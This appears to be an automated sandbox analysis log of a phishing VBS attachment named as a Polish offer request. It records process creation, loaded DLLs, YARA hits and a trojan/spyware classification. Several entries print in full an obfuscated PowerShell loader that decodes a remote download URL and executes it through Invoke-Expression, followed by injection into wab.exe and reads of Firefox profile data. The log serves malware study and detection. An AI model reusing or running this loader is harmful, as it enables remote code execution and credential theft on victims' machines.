              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygn
              Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 49%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC22B4F616_2_00007FFAAC22B4F6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC22C2A216_2_00007FFAAC22C2A2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_027FF1F020_2_027FF1F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_027FFAC020_2_027FFAC0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_0323D23822_2_0323D238
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_03234AA822_2_03234AA8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_03233E9022_2_03233E90
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_03239EF822_2_03239EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_032341D822_2_032341D8
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeCode function: 24_2_00161C5C24_2_00161C5C
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeCode function: 24_2_001625D324_2_001625D3
              Source: Zapytanie ofertowe (GASTRON 07022024).vbsInitial sample: Strings found which are bigger than 50
              Source: amsi32_7004.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 4704, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7004, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@14/10@3/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Veinless.DisJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1832:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0svqftf5.b3a.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zapytanie ofertowe (GASTRON 07022024).vbs"
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeCommand line argument: WABOpen24_2_00161C5C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4704
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7004
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              Source: Zapytanie ofertowe (GASTRON 07022024).vbsVirustotal: Detection: 9%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zapytanie ofertowe (GASTRON 07022024).vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygn
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygn
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe "C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe"
              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe "C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($LandbrugsbygnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
